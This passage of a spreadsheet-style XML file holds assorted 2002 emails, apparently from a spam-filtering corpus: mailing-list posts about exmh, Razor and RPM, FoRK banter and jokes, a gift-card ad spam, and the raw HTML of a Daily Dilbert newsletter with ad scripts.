 &lt;/body&gt;
 &lt;/html&gt;
 &lt;IMG HEIGHT=1 WIDTH=1 SRC="http://clickthru.online.com/Click?q=17-agRtnIX-oKdM4KZpIyd_CUb3qRRR"&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">    Date:        Wed, 21 Aug 2002 10:40:39 -0500
     From:        Chris Garrigues &lt;cwg-dated-1030376441.95dd45@DeepEddy.Com&gt;
     Message-ID:  &lt;1029944441.398.TMDA@deepeddy.vircio.com&gt;
   | The background color in this window is the same as the background 
   | color in the ftoc.
 That's what I'd like to vary - particularly as the ftoc background isn't
 constant - messages in the unseen sequence have a different background
 than others.
 In the ftoc that's fine, but in the sequences window, it isn't needed.
 unseen already has a different foreground there (no problem with that),
 it doesn't need a different background as well.
 I'll play about a bit with this, and with making it vertical instead of
 horizontal, and see what turns up.
   | The only sequences that are defined there are sequences which are defined
   | in app-defaults-color or ~/exmh/exmh-defaults-color.
 OK.
   | I've been thinking about how to dynamically generate highlighting for
   | other sequences, but haven't got that figured out yet.
 In this case, highlighting wasn't what I was most concerned about.
 A method to get messages in &amp; out of sequences comes first, how it
 displays is a secondary consideration.   But as a suggestion, have an
 "all unknown" sequence highlight, any message in a sequence which has
 no defined highlighting (where defined includes defined to not be treated
 specially) gets highlighted the same way (maybe something as boring as
 a dark brown text colour - almost indistinguishable from the normal black)
   | &gt; &gt; Any chance of making the current message a little brighter background?
   | 
   | I don't see any reason why not.  Experiment and let me know what works for you.
 Done some of that.   First, the most significant change came from changing
 relief from raised to sunken.   I don't know why, but it just looks better
 (for me anyway).   But even with that, cur and unseen are still just a
 bit too similar.   I ended up using
 *sequence_cur:  -background {PaleGoldenrod} -relief sunken -borderwidth 2
 The unnecessary braces are just because some of the colours I was using
 had spaces in their names.   PaleGoldenrod translates as #eee8aa which
 is probably safer for generic use.
 kre
 _______________________________________________
 Exmh-workers mailing list
 Exmh-workers@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-workers
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; Russell Turpin:
 &gt; &gt; That depends on how the list is collected, or
 &gt; &gt; even on what the senders say about how the list
 &gt; &gt; is collected. 
 Senders should vary the recipient list to include non-targets, like party
 officials, and to exclude targets enough to give them plausible
 deniability.
 - Lucas
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Sorry... I just had a run-in with a neighbor whom I've never met before who
 pigeonholed me within one minute after I asked a question - he said 'Are you
 one of them environmentalists?' For some reason that narrowminded attitude
 of not listening to what I was saying and categorizing me into a box in his
 little paranoid republican fantasy world just pissed me off.
 Sheesh... I've been out of work too long...
 ----- Original Message -----
 From: "Tom" &lt;tomwhore@slack.net&gt;
 To: "Mr. FoRK" &lt;fork_list@hotmail.com&gt;
 Cc: "FoRK" &lt;fork@spamassassin.taint.org&gt;
 Sent: Monday, September 23, 2002 2:22 PM
 Subject: Re: Goodbye Global Warming
 &gt;
 &gt; --]&gt; A Green once said that if the Spotted Owl hadn't existed they
 &gt; --]&gt; would have had to invent it.
 &gt; --]A Republican once said "I am not a crook".
 &gt; --]
 &gt;
 &gt; Oh great, another round of Lableisms....Let me know when you get back to
 &gt; real data..
 &gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">  Not sure what you're asking.  
   Content-Type: message/rfc822 mails are handled like attachments
   and are not broken down further into mime parts.  That is, the attachment
   is treated as one part.  The headers and body of the message/rfc822 are
   sent to the server without parsing.  The other way to handle it is to treat it like
   a regular mail, and break it down into parts.
   There are reasons to break it down and not to break it down, and right 
   now we chose not to break it down.  This might change in the future.
   -chad
 On 26/07/02 02:24 +0200, Jrgen Thomsen wrote:
 ) I cannot determine if a verbatim forwarded message from Agent is handled
 ) correctly i.e. that a message with Content-Type: message/rfc822 does not
 ) include the original header lines improperly in the email body when reporting
 ) the spam. It would be really nice and convenient if it supported as the Agent
 ) verbatim forwarding option is easy to use. 
 ) SpamCop does understand the format.
 ) See an examle below:
 ) 
 ) - Jrgen
 ) 
 ) Return-Path: &lt;un@s.jth.net&gt;
 ) Delivered-To: jth@jth.net
 ) Received: from vennely1 (vennely1 [194.192.106.109])
 ) 	by mail.jth.net (Postfix) with SMTP id 17A9118684
 ) 	for &lt;j@jth.net&gt;; Fri, 26 Jul 2002 02:15:03 +0200 (CEST)
 ) From: =?ISO-8859-1?Q?J=F8rgen_Thomsen?= &lt;un@s.jth.net&gt;
 ) To: j@jth.net
 ) Subject: (fwd) [Razor-users] Razor Agents 2.14 Released
 ) Date: Fri, 26 Jul 2002 02:14:57 +0200
 ) Message-ID: &lt;o351kukdidthhk6fohls8s6b4j5rfghp3i@4ax.com&gt;
 ) X-Mailer: Forte Agent 1.91/32.564
 ) MIME-Version: 1.0
 ) Content-Type: message/rfc822
 ) Content-Disposition: inline
 ) 
 ) Return-Path: &lt;razor-users-admin@example.sourceforge.net&gt;
 ) Delivered-To: list@jth.net
 ) Received: from usw-sf-list2.sourceforge.net (usw-sf-fw2.sourceforge.net
 ) [216.136.171.252])
 ) 	by mail.jth.net (Postfix) with ESMTP id 88B0F18684
 ) 	for &lt;list@jth.net&gt;; Fri, 26 Jul 2002 01:18:00 +0200 (CEST)
 ) 
 ) and the rest of the original header and the body
 ) 
 ) 
 ) -------------------------------------------------------
 ) This sf.net email is sponsored by: Jabber - The world's fastest growing 
 ) real-time communications platform! Don't just IM. Build it in! 
 ) http://www.jabber.com/osdn/xim
 ) _______________________________________________
 ) Razor-users mailing list
 ) Razor-users@lists.sourceforge.net
 ) https://lists.sourceforge.net/lists/listinfo/razor-users
 -------------------------------------------------------
 This sf.net email is sponsored by: Jabber - The world's fastest growing 
 real-time communications platform! Don't just IM. Build it in! 
 http://www.jabber.com/osdn/xim
 _______________________________________________
 Razor-users mailing list
 Razor-users@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Kid crams acorn up his nose, hilarity ensues
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-2,8419990,1717/
 Date: 2002-10-01T05:31:18+01:00
 [IMG: http://www.newsisfree.com/Images/fark/sun.gif ([The Sun])]
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: Tech's Major Decline
</t>
  </si>
  <si>
    <t xml:space="preserve">
 I'm not sure which way to make
 the old bits call on this:
 [A] &lt;http://www.xent.com/pipermail/fork/2002-September/014448.html&gt;
 was posted well after
 [B] &lt;http://www.xent.com/pipermail/fork/2002-August/014351.html&gt;
 was in the archives, but then
 again, [B] didn't bother with
 any commentary (new bits).
 If you two can agree upon who
 was at fault, penance will be
 to explain how feedback phase
 is affected by time lags, and
 tie that in to the spontaneous
 generation of "business cycles"
 in the Beer Game. *
 -Dave
 * &lt;http://web.mit.edu/jsterman/www/SDG/beergame.html&gt;
 see also:
 Explaining Capacity Overshoot and Price War: Misperceptions
   of Feedback in Competitive Growth Markets 
 &lt;http://web.mit.edu/jsterman/www/B&amp;B_Rev.html&gt;
 in which the scenario 4 (margin
 oriented tit for tat) seems close
 to the strategy described in:
 "game theoretical gandhi / more laptops"
 &lt;http://www.xent.com/aug00/0200.html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: "requires:" and relational operators
</t>
  </si>
  <si>
    <t xml:space="preserve">Halloechen!
 On Dienstag, 27. August 2002 05:41 schrieben Sie:
 &gt; [Question about require tag]
 Oops, sorry.  Now I found out that there is a noewsgroup ...
 :-)
 Tschoe,
 Torsten.
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Music school jokes --
 American conductor and European conductor are talking.  European conductor 
 says "what a week, I've had 5 rehearsals and a performance."  "That's 
 nothing," says the American conductor, "I've had five performances and a 
 rehearsal."  
 What's the difference between a spring in the desert surrounded by palm 
 trees and a violist that plays in tune?  A violist that plays in tune is a 
 mirage.
 What's the difference between a rat and a guitar player?  The rat's got 
 something to do tonight.
 Good thing it's not comedy school.
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG-Social] Claim Your $25 Kmart Gift Card
</t>
  </si>
  <si>
    <t xml:space="preserve">1) Claim Your $25 Kmart Gift Card
 http://www.adclick.ws/p.cfm?o=320&amp;s=pk00001
 2) Auto Loans, Fast Approvals for Any Credit!
 http://www.adclick.ws/p.cfm?o=383&amp;s=pk1
 3) Are You Paying Too Much for Auto Insurance - Find Out?
 http://www.adclick.ws/p.cfm?o=334&amp;s=pk1
 Have a Wonderful Day,
 PrizeMama.com
 ------------------
 You are receiving this email because you have opted-in to receive
 email from publisher: prizemama.  To unsubscribe, click below:
 http://u2.azoogle.com/?z=93-1090346-62lLC4
 -- 
 Irish Linux Users' Group Social Events: social@linux.ie
 http://www.linux.ie/mailman/listinfo/social for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Your Daily Dilbert 07/10/2002
</t>
  </si>
  <si>
    <t xml:space="preserve">--23561619.1026296118170.JavaMail.root.umsan1
 Content-Type: text/plain; charset=ISO-8859-1
 Content-Transfer-Encoding: 7bit
 E-mail error
 You're subscribed to the HTML version of the Daily Dilbert,
 which shows the comic strip as a graphic, but your mail system
 either can't support HTML or is set up to remove HTML content. For
 more information, contact your Internet service provider or mail
 system administrator.
 To change to a plain text subscription, modify your account
 preferences at 
 http://www.dilbert.com/comics/dilbert/daily_dilbert/html/login.html
 The plain text option appears toward the bottom of the modification
 page.
 --23561619.1026296118170.JavaMail.root.umsan1
 Content-Type: text/html; charset=ISO-8859-1
 Content-Transfer-Encoding: quoted-printable
 &lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"&gt;
 &lt;HTML&gt;
 &lt;HEAD&gt;
 &lt;TITLE&gt;Daily Dilbert&lt;/TITLE&gt;
 &lt;meta http-equiv=3D"pragma" content=3D"no-cache"&gt;
 &lt;META HTTP-EQUIV=3D"expires" CONTENT=3D"0"&gt;
 &lt;meta http-equiv=3D"Cache-control" content=3D"no-cache"&gt;
 &lt;/HEAD&gt;
 &lt;BODY BGCOLOR=3D"#336699" text=3D"#000000" link=3D"#000000" vlink=3D"#00339=
 9" alink=3D"#3333CC" MARGINWIDTH=3D"0" MARGINHEIGHT=3D"8" LEFTMARGIN=3D"0" =
 TOPMARGIN=3D"8"&gt;
 &lt;TABLE WIDTH=3D"100%" BORDER=3D"0" CELLPADDING=3D"0" BGCOLOR=3D"#336699"&gt;
 &lt;TR&gt;
 &lt;TD BGCOLOR=3D"#336699" WIDTH=3D"15"&gt;&lt;IMG SRC=3D"http://www.comics.com/comi=
 cs/dilbert/images/clear_dot.gif" WIDTH=3D"15" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 &lt;TD BGCOLOR=3D"#336699"&gt;
 &lt;SCRIPT LANGUAGE=3D"JAVASCRIPT"&gt;
 &lt;!--=20
 function rand(n)=20
 {
 seed =3D (0x015a4e35 * seed) % 0xfffffff;
 return (seed &gt;&gt; 16) % n;
 }
 var now =3D new Date ();
 var seed =3D now.getTime() % 0xffffffff;
 var same =3D rand(1000);
 // End hiding script from old browsers --&gt;
 &lt;/SCRIPT&gt;
 &lt;SCRIPT Language=3D"JavaScript"&gt;
 &lt;!-- hide from old browsers
   var today =3D new Date()
 //--&gt;
 &lt;/SCRIPT&gt;
 &lt;!-- CONTENT AND SKYSCRAPER AD TABLE BEGIN --&gt;
 &lt;TABLE CELLPADDING=3D"0" CELLSPACING=3D"0" BORDER=3D"0"&gt;
 =09&lt;TR VALIGN=3D"TOP"&gt;=09
 =09=09&lt;TD BGCOLOR=3D"#336699"&gt;
 =09=09=09&lt;!-- AD TABLE BEGIN --&gt;
 =09=09=09&lt;TABLE WIDTH=3D"627" CELLPADDING=3D"0" CELLSPACING=3D"0" BORDER=3D=
 "0"&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;=09
 =09=09=09=09=09&lt;TD WIDTH=3D"468" BGCOLOR=3D"#336699"&gt;&lt;IMG SRC=3D"http://www=
 .comics.com/comics/dilbert/images/small_ad.gif" WIDTH=3D"20" HEIGHT=3D"11" =
 BORDER=3D"0" ALT=3D"Advertisement"&gt;&lt;BR&gt;&lt;IMG SRC=3D"http://www.comics.com/co=
 mics/dilbert/images/clear_dot.gif" WIDTH=3D"1" HEIGHT=3D"1" BORDER=3D"0" AL=
 T=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"21" BGCOLOR=3D"#336699" ROWSPAN=3D"2"&gt;&lt;IMG SRC=
 =3D"http://www.comics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"21"=
  HEIGHT=3D"72" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"120" BGCOLOR=3D"#336699"&gt;&lt;IMG SRC=3D"http://www=
 .comics.com/comics/dilbert/images/small_ad.gif" WIDTH=3D"20" HEIGHT=3D"11" =
 BORDER=3D"0" ALT=3D"Advertisement"&gt;&lt;BR&gt;&lt;IMG SRC=3D"http://www.comics.com/co=
 mics/dilbert/images/clear_dot.gif" WIDTH=3D"1" HEIGHT=3D"1" BORDER=3D"0" AL=
 T=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"18" BGCOLOR=3D"#336699" ROWSPAN=3D"2"&gt;&lt;IMG SRC=
 =3D"http://www.comics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"18"=
  HEIGHT=3D"72" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09=09
 =09=09=09=09
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;=09
 =09=09=09=09=09&lt;TD WIDTH=3D"468" BGCOLOR=3D"#336699"&gt;
 =09=09=09=09=09&lt;!-- BEGIN ENHANCED CREATIVE --&gt;
 =09=09=09=09=09&lt;SCRIPT LANGUAGE=3D"JavaScript"&gt;
 =09=09=09=09=09&lt;!--
 =09=09=09=09=09document.write ('&lt;TABLE WIDTH=3D"468" CELLSPACING=3D"0" CELL=
 PADDING=3D"0" BORDER=3D"0"&gt;&lt;TR VALIGN=3D"TOP"&gt;&lt;TD ALIGN=3D"LEFT"&gt;&lt;ILAYER ID=
 =3Dph1 VISIBILITY=3Dhidden width=3D"468" height=3D"60"&gt;&lt;/ILAYER&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;=
 /TABLE&gt;');
 =09=09=09=09=09document.write ('&lt;NOLAYER&gt;');
 =09=09=09=09=09document.write ('&lt;IFRAME SRC=3D"http://ad.doubleclick.net/ad=
 i/dilbert.email.com/email/;sz=3D468x60;ptile=3D1;ord=3D' + same + '?" name=
 =3D"frame1" width=3D"468" height=3D"60" frameborder=3D"no" border=3D"0" MAR=
 GINWIDTH=3D"0" MARGINHEIGHT=3D"0" SCROLLING=3D"no"&gt;');
 =09=09=09=09=09document.write ('&lt;A target=3D"_blank" HREF=3D"http://ummail4=
 .unitedmedia.com:80/Click?q=3D84-CCDyQ60lyggM3vtZsnhhpYUoZsRR"&gt;');
 =09=09=09=09=09document.write ('&lt;IMG SRC=3D"http://ad.doubleclick.net/ad/di=
 lbert.email.com/email/;abr=3D!ie;sz=3D468x60;ptile=3D1;ord=3D' + same + '?"=
  border=3D"0" WIDTH=3D"468" HEIGHT=3D"60"&gt;&lt;/A&gt;&lt;/IFRAME&gt;');
 =09=09=09=09=09document.write ('&lt;/NOLAYER&gt;');=20
 =09=09=09=09=09//--&gt;
 =09=09=09=09=09&lt;/SCRIPT&gt;
 =09=09=09=09=09&lt;NOSCRIPT&gt;
 =09=09=09=09=09&lt;A target=3D"_blank" HREF=3D"http://ummail4.unitedmedia.com:=
 80/Click?q=3D99-4mayQAdljOrY53a2HHfS87c8B9RR"&gt;&lt;IMG SRC=3D"http://ad.doublec=
 lick.net/ad/dilbert.email.com/email/;abr=3D!ie;sz=3D468x60;ptile=3D1;ord=3D=
 1986839?" BORDER=3D"0" WIDTH=3D"468" HEIGHT=3D"60"&gt;&lt;/a&gt;
 =09=09=09=09=09&lt;/NOSCRIPT&gt;
 =09=09=09=09=09&lt;!-- END ENHANCED CREATIVE --&gt;&lt;/TD&gt;
 =09=09=09=09=09
 =09=09=09=09=09
 =09=09=09=09=09
 =09=09=09=09=09&lt;TD WIDTH=3D"120" BGCOLOR=3D"#336699"&gt;&lt;IMG SRC=3D"http://www=
 .comics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"1" HEIGHT=3D"1" B=
 ORDER=3D"0" ALT=3D""&gt;&lt;BR&gt;&lt;A target=3D"_blank" HREF=3D"http://ummail4.united=
 media.com:80/Click?q=3Dae-jOB6QMB3LJiS_0q8-1hV197zDRRR"&gt;&lt;IMG SRC=3D"http://=
 www.comics.com/comics/dilbert/daily_dilbert/images/dilbert_tshirt_120x60.gi=
 f" WIDTH=3D"120" HEIGHT=3D"60" BORDER=3D"0" ALT=3D"Shop Dilbert"&gt;&lt;/A&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09=09
 =09=09=09=09
 =09=09=09=09
 =09=09=09=09
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"627" HEIGHT=3D"10" COLSPAN=3D"4"&gt;&lt;IMG SRC=3D"ht=
 tp://www.comics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"627" HEIG=
 HT=3D"10" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09&lt;/TABLE&gt;
 =09=09=09&lt;!-- AD TABLE END --&gt;
 =09=09=09
 =09=09=09&lt;!-- HEADER TABLE BEGIN --&gt;
 =09=09=09&lt;TABLE WIDTH=3D"627" CELLPADDING=3D"0" CELLSPACING=3D"0" BORDER=3D=
 "0"&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;=09
 =09=09=09=09=09&lt;TD WIDTH=3D"515" BGCOLOR=3D"#336699" ROWSPAN=3D"3"&gt;&lt;A targe=
 t=3D"_blank" HREF=3D"http://ummail4.unitedmedia.com:80/Click?q=3Dc3-x1sCQJL=
 o-Qw0W2VZ57n0NcndxRRR"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/dai=
 ly_dilbert/images/daily_dilbert_header_left.gif" WIDTH=3D"515" HEIGHT=3D"76=
 " BORDER=3D"0" ALT=3D"Daily Dilbert"&gt;&lt;/A&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"90" BGCOLOR=3D"#336699"&gt;&lt;IMG SRC=3D"http://www.=
 comics.com/comics/dilbert/daily_dilbert/images/daily_dilbert_header_mid_top=
 .gif" WIDTH=3D"90" HEIGHT=3D"55" BORDER=3D"0" ALT=3D"Daily Dilbert"&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"5" BGCOLOR=3D"#336699" ROWSPAN=3D"3"&gt;&lt;IMG SRC=
 =3D"http://www.comics.com/comics/dilbert/daily_dilbert/images/daily_dilbert=
 _header_right.gif" WIDTH=3D"5" HEIGHT=3D"76" BORDER=3D"0" ALT=3D"Daily Dilb=
 ert"&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"17" ROWSPAN=3D"3"&gt;&lt;IMG SRC=3D"http://www.comics=
 .com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"17" HEIGHT=3D"10" BORDER=
 =3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09=09
 =09=09=09=09&lt;!-- ENTER DATE HERE --&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;=09
 =09=09=09=09=09&lt;TD WIDTH=3D"90" BGCOLOR=3D"#003366" HEIGHT=3D"13"&gt;&lt;FONT FAC=
 E=3D"helvetica, arial" SIZE=3D"1" COLOR=3D"#FFFFFF"&gt;&lt;B&gt;07/10/2002&lt;/B&gt;&lt;/FONT=
 &gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"90" BGCOLOR=3D"#336699"&gt;&lt;IMG SRC=3D"http://www.=
 comics.com/comics/dilbert/daily_dilbert/images/daily_dilbert_header_mid_bot=
 tom.gif" WIDTH=3D"90" HEIGHT=3D"8" BORDER=3D"0" ALT=3D"Daily Dilbert"&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09&lt;/TABLE&gt;
 =09=09=09&lt;!-- HEADER TABLE END --&gt;
 =09=09=09
 =09=09=09&lt;!-- WHITE LINE AND GREETING TABLE BEGIN --&gt;
 =09=09=09&lt;TABLE WIDTH=3D"627" CELLPADDING=3D"0" CELLSPACING=3D"0" BORDER=3D=
 "0"&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;=09
 =09=09=09=09=09&lt;TD WIDTH=3D"1" HEIGHT=3D"2" BGCOLOR=3D"#003366"&gt;&lt;IMG SRC=3D=
 "http://www.comics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"1" HEI=
 GHT=3D"2" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"605" HEIGHT=3D"2" BGCOLOR=3D"#FFFFFF" COLSPAN=
 =3D"2"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.gi=
 f" WIDTH=3D"605" HEIGHT=3D"2" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"4" HEIGHT=3D"2" BGCOLOR=3D"#FFFFFF"&gt;&lt;IMG SRC=3D=
 "http://www.comics.com/comics/dilbert/daily_dilbert/images/white_line_right=
 .gif" WIDTH=3D"4" HEIGHT=3D"2" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"17" HEIGHT=3D"48" ROWSPAN=3D"4"&gt;&lt;IMG SRC=3D"htt=
 p://www.comics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"17" HEIGHT=
 =3D"48" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;=09
 =09=09=09=09=09&lt;TD WIDTH=3D"1" HEIGHT=3D"37" BGCOLOR=3D"#003366" ROWSPAN=3D=
 "2"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.gif" =
 WIDTH=3D"1" HEIGHT=3D"39" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"605" HEIGHT=3D"5" BGCOLOR=3D"#FFCC66" COLSPAN=
 =3D"2"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.gi=
 f" WIDTH=3D"605" HEIGHT=3D"7" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"4" HEIGHT=3D"37" BACKGROUND=3D"http://www.comic=
 s.com/comics/dilbert/daily_dilbert/images/ffcc66_right.gif" ROWSPAN=3D"2"&gt;&lt;=
 IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.gif" WIDTH=
 =3D"4" HEIGHT=3D"39" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"10" HEIGHT=3D"32" BGCOLOR=3D"#FFCC66"&gt;&lt;IMG SRC=
 =3D"http://www.comics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"10"=
  HEIGHT=3D"32" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"595" HEIGHT=3D"32" BGCOLOR=3D"#FFCC66"&gt;&lt;FONT FA=
 CE=3D"Arial,Verdana" SIZE=3D"1"&gt;Hi Justin, enjoy your daily comic from &lt;A t=
 arget=3D"_blank" HREF=3D"http://ummail4.unitedmedia.com:80/Click?q=3D02-qit=
 9IljN-Yow111_XDuuQWJBb9RR"&gt;Dilbert.com&lt;/A&gt;.&lt;BR&gt;&lt;B&gt;If you like the Daily Dil=
 bert, tell a friend! &lt;A target=3D"_blank" HREF=3D"http://ummail4.unitedmedi=
 a.com:80/Click?q=3D17-agRtI5XXfb4JSGFIzysGCUNA7RRR"&gt;Click here to send mail=
 &lt;/A&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"1" BGCOLOR=3D"#003366"&gt;&lt;IMG SRC=3D"http://www.c=
 omics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"1" HEIGHT=3D"7" BOR=
 DER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"605" BGCOLOR=3D"#FFFFFF" COLSPAN=3D"2"&gt;&lt;IMG SRC=
 =3D"http://www.comics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"605=
 " HEIGHT=3D"7" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"4" HEIGHT=3D"7" BACKGROUND=3D"http://www.comics=
 .com/comics/dilbert/daily_dilbert/images/ffffff_right.gif"&gt;&lt;IMG SRC=3D"http=
 ://www.comics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"4" BORDER=
 =3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09&lt;/TABLE&gt;
 =09=09=09&lt;!-- WHITE LINE AND GREETING TABLE END --&gt;
 =09=09=09
 =09=09=09&lt;!-- ONLINE STORE AND STRIP TABLE BEGIN --&gt;
 =09=09=09&lt;TABLE WIDTH=3D"627" CELLPADDING=3D"0" CELLSPACING=3D"0" BORDER=3D=
 "0"&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;=09
 =09=09=09=09=09&lt;TD WIDTH=3D"1" HEIGHT=3D"348" BGCOLOR=3D"#003366" ROWSPAN=
 =3D"5"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.gi=
 f" WIDTH=3D"1" HEIGHT=3D"348" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"4" HEIGHT=3D"348" BGCOLOR=3D"#FFFFFF" ROWSPAN=
 =3D"5"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.gi=
 f" WIDTH=3D"4" HEIGHT=3D"348" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"6" HEIGHT=3D"83" BGCOLOR=3D"#FFFFFF" ROWSPAN=3D=
 "4"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.gif" =
 WIDTH=3D"6" HEIGHT=3D"83" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"585" HEIGHT=3D"19" BGCOLOR=3D"#FFFFFF" COLSPAN=
 =3D"7"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/daily_dilbert/image=
 s/header_online_store.gif" WIDTH=3D"200" HEIGHT=3D"15" BORDER=3D"0" ALT=3D"=
 "&gt;&lt;BR&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.gif=
 " WIDTH=3D"4" HEIGHT=3D"4" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"9" HEIGHT=3D"83" BGCOLOR=3D"#FFFFFF" ROWSPAN=3D=
 "4"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.gif" =
 WIDTH=3D"9" HEIGHT=3D"83" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"1" HEIGHT=3D"348" BGCOLOR=3D"#FFFFFF" ROWSPAN=
 =3D"5"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.gi=
 f" WIDTH=3D"1" HEIGHT=3D"348" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"4" HEIGHT=3D"348" BACKGROUND=3D"http://www.comi=
 cs.com/comics/dilbert/daily_dilbert/images/white_line_right.gif" ROWSPAN=3D=
 "5"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.gif" =
 WIDTH=3D"4" HEIGHT=3D"348" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"17" HEIGHT=3D"349" ROWSPAN=3D"6"&gt;&lt;IMG SRC=3D"ht=
 tp://www.comics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"17" HEIGH=
 T=3D"349" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
